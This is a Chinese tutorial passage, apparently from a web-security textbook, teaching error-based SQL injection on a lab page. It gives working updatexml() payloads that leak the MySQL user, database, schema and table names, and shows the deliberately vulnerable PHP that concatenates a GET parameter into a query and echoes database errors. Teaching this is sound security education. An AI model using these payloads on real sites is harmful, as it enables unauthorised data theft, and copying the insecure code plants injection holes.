报错注入攻击
报错注入攻击的测试地址在本书第2章。
先访问error.php?username=1',因为参数username的值是1'。在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图4-35所示。
图4-35
通过页面返回结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入获取数据。报错注入有多种利用方式,此处只讲解利用MySQL函数updatexml()获取user()的值,SQL语句如下:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
其中0x7e是ASCII编码,解码结果为~,如图4-36所示。
图4-36
然后尝试获取当前数据库的库名,语句如下:
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
得到的结果如图4-37所示。
图4-37
接着可以利用select语句继续获取数据库中的库名、表名和字段名,查询语句与Union注入的查询语句相同。因为报错注入只显示一条结果,所以需要使用limit语句。构造的语句如下:
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
结果如图4-38所示,可以获取数据库的库名。
图4-38
构造查询表名的语句如下:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= 'test' limit 0,1),0x7e),1)--+
如图4-39所示,可以获取数据库test的表名。
图4-39
报错注入代码分析
在报错注入页面,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,就输出ok;如果出错,则通过echo mysqli_error($con)将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下:
<?php$con=mysqli_connect("localhost","root","123456","test");if (mysqli_connect_errno()){echo "连接失败: " . mysqli_connect_error();}$username = $_GET['username'];if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){echo "ok";}else{echo mysqli_error($con);}?>
输入username=1'时,SQL语句为select * from users where `username`='1''。执行时,会因为多了一个单引号而报错。利用这种错误回显,可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)